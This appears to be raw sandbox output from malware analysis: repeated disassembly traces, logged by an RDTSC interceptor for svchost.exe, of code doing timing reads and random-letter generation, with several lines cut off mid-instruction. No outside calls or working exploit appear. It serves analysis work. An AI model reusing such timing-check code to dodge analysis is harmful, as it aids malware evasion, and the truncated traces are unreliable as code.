Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59155h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59810h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA591D0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59810h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594D3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEB6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59113h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59810h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA597D3h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
